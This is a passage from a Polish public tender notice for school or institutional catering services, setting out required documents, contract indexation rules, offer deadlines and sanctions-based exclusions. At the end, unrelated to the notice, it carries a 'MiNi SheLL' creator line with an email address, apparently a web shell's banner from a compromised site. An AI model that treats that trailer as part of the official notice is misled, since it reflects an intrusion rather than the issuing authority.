potrzeby realizacji zamówienia lub inny <br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując <br/>zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu –<br/>w przypadku zobowiązania podmiotu udostępniającego zasoby, zobowiązanie <br/>winno potwierdzać, że stosunek łączący wykonawcę z podmiotem <br/>udostepniającym zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz <br/>określać w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego <br/>zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego <br/>zasobów podmiotu udostępniającego te zasoby przy wykonywaniu <br/>zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach <br/>którego wykonawca polega w odniesieniu do warunków udziału <br/>w postępowaniu dotyczących doświadczenia, zrealizuje usługi, których <br/>wskazane zdolności dotyczą.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, którego oferta została najwyżej oceniona, jest zobowiązany <br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia <br/>wezwania zamawiającego, aktualnych na dzień składania następujących <br/>oświadczeń lub dokumentów: <br/>1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o niepodleganiu wykluczeniu z postępowania, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez zamawiającego, sporządzonego zgodnie <br/>z wzorem stanowiącym załącznik nr 7 do SWZ,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, oświadczenie składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków udziału <br/>w postępowaniu polega na zdolnościach lub sytuacji podmiotów <br/>udostępniających zasoby, należy dołączyć oświadczenie podmiotu <br/>udostępniającego zasoby.<br/><br/> decyzję Powiatowego Inspektoratu Sanitarnego dopuszczającą wykonawcę <br/>(nazwa, adres, miejsce) do prowadzenia działalności w zakresie <br/>przygotowywania potraw od surowca do gotowej potrawy, i wydawania <br/>potraw w naczyniach wielokrotnego lub jednorazowego użytku – część nr 1<br/>i/lub<br/>decyzję Powiatowego Inspektoratu Sanitarnego dopuszczającą wykonawcę <br/>(nazwa, adres, miejsce) do do prowadzenia działalności w zakresie <br/>przygotowywania potraw od surowca do gotowej potrawy oraz <br/>przygotowywania i dostarczania żywności do odbiorców zewnętrznych <br/>(catering) w specjalnych termosach – część nr 2<br/>4) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub <br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat licząc wstecz od <br/>dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, <br/>dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub <br/>są wykonywane, oraz załączeniem dowodów określających, czy te usługi <br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o <br/>których mowa, są referencje bądź inne dokumenty sporządzone przez <br/><br/>podmiot, na rzecz którego usługi zostały wykonane, a w przypadku <br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń <br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne <br/>dokumenty potwierdzające ich należyte wykonywanie powinny być <br/>wystawione w okresie ostatnich 3 miesięcy; sporządzony zgodnie z wzorem <br/>stanowiącym załącznik nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenia <br/>i dokumenty, o których mowa w ppkt 2-5 oraz dodatkowo następujące oświadczenia <br/>i dokumenty: <br/>6) oświadczenie, z którego wynika, które usługi wykonają poszczególni <br/>wykonawcy, określające zakres jaki wykona każdy z wykonawców wspólnie <br/>ubiegających się o zamówienie, sporządzone zgodnie z wzorem stanowiącym <br/>załącznik nr 6 do SWZ – oświadczenie składa pełnomocnik w imieniu <br/>wszystkich wykonawców wspólnie ubiegających się o zamówienie,<br/>7) pełnomocnictwo do reprezentowania wykonawcy wspólnie ubiegającego się <br/>o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Wynagrodzenie wykonawcy określone w umowie może zostać zmienione w przypadku zmiany stawki podatku od towarów i usług. W przypadku zmiany, o której mowa w zdaniu poprzedzającym, wynagrodzenie wykonawcy ulega zmianie wyłącznie w odniesieniu do części przedmiotu umowy zrealizowanej po dniu wejścia w życie przepisów zmieniających stawkę podatku oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku. Wynagrodzenie wykonawcy może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku zastosowania zmienionych stawek podatków ulega zmianie kwota należnego podatku. 2.Dopuszcza się możliwość zmiany postanowień umowy w zakresie dotyczącym zmiany podwykonawcy lub zmiany wskazanych lub wprowadzenia nowych części przedmiotu umowy, które wykonawca będzie wykonywał za pomocą podwykonawców, na zasadach określonych w niniejszej umowie.3.	Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadkach określonych w art. 455 pzp. 4.Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zmianę. <br/> 1.Strony mogą ubiegać się o zmianę wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany cen materiałów lub kosztów związanych z realizacją zamówienia. 2.Na zasadach opisanych w niniejszym paragrafie Strony będą waloryzowały koszty realizacji Przedmiotu Umowy Waloryzacja będzie polegała na podwyższeniu albo obniżeniu ceny jednostkowej za 1 posiłek podanej przez Wykonawcę w ofercie. <br/>3.	W trakcie okresu realizacji Umowy, o którym mowa w § 8 ust. 1, Waloryzacja zostanie dokonana jednorazowo na pierwszy dzień roboczy po upływie 6 miesięcy od dnia realizacji przedmiotu umowy<br/>4.	Waloryzacja zostanie dokonana w oparciu o wartości wskaźnika cen towarów i usług konsumpcyjnych ogółem za II kwartał ogłoszonego w formie komunikatu Prezesa GUS. 5. Waloryzacja nie wymaga zawarcia aneksu do Umowy. Ewentualna Waloryzacja zostanie obliczona przez:<br/>1)	Wykonawcę, w przypadku gdy nastąpi wzrost wynagrodzenia Wykonawcy. <br/>O nowej (zwaloryzowanej) cenie za 1 posiłek Wykonawca poinformuje Zamawiającego pisemnie podając jej nową wysokość uwzględniającą Waloryzację oraz sposób obliczenia; <br/>2)	Zamawiającego, w przypadku gdy nastąpi spadek wynagrodzenia Wykonawcy. <br/>O nowej (zwaloryzowanej) cenie za 1 posiłek Zamawiający poinformuje Wykonawcę pisemnie podając jej nową wysokość uwzględniającą Waloryzację oraz sposób jej obliczenia. <br/>Każda ze stron może wnieść zastrzeżenia w terminie 14 dni od dnia doręczenia nowych, zwaloryzowanych cen. <br/>6.	W przypadku, gdy strona której przysługuje uprawnienie określone w ust. 4 nie poinformuje, w terminie 7 dni od dnia ogłoszenia komunikatu o którym mowa w ust. 4 o nowej, zwaloryzowanej cenie za 1 posiłek drugą stronę umowy oznacza to, że strona przyjmuje, że nie nastąpiły zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia. W takim przypadku strona ta nie może domagać się dokonania waloryzacji na późniejszym etapie wykonywania niniejszej umowy. 7. 7W ramach Waloryzacji nowa kwota za 1 posiłek zostanie ustalona w następujący sposób: Cn = Cp +(Cp x CP) <br/>8.	Nowa (zwaloryzowana) cena za 1 posiłek będzie dotyczyć zapłaty należnej Wykonawcy za wykonany przedmiot umowy po Dniu Dokonania Waloryzacji.<br/>9.	Strony ustalają maksymalną wartość obniżenia albo wzrostu Wartości Przedmiotu Umowy w efekcie zastosowania Waloryzacji na poziomie nie większym niż 10 %. <br/>10.	Wykonawca, który uzyska Waloryzację zobowiązany jest do zmiany wynagrodzenia przysługującego Podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom kosztów dotyczących zobowiązania podwykonawcy, jeżeli okres obowiązywania umowy przekracza 6 miesięcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-05 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">e-PUAP lub E-zamównienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-05 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia, na podstawie art. 7 ust. 1 ustawy z dnia <br/>13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania <br/>wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <br/>(Dz. U. 2023 r., poz.1497 ze zm.) zwanej dalej „ustawą” wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady <br/>(WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających <br/>w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec <br/>Ukrainy zwanym dalej „rozporządzeniem 765/2006” <br/>i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie <br/>Nr sprawy: OA.3201.5.2023 strona 9 z 31<br/>środków ograniczających w odniesieniu do działań podważających integralność <br/>terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających zwanym <br/>dalej „rozporządzeniem 269/2014”, albo wpisanego na listę na podstawie <br/>decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o <br/>którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 <br/>marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu <br/>(Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych <br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub <br/>będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile <br/>została wpisana na listę na podstawie decyzji w sprawie wpisu na listę <br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 <br/>ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 <br/>ze zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu <br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką <br/>jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na <br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu <br/>środka, o którym mowa w art. 1 pkt 3 ustawy.”

Creat By MiNi SheLL
Email: jattceo@gmail.com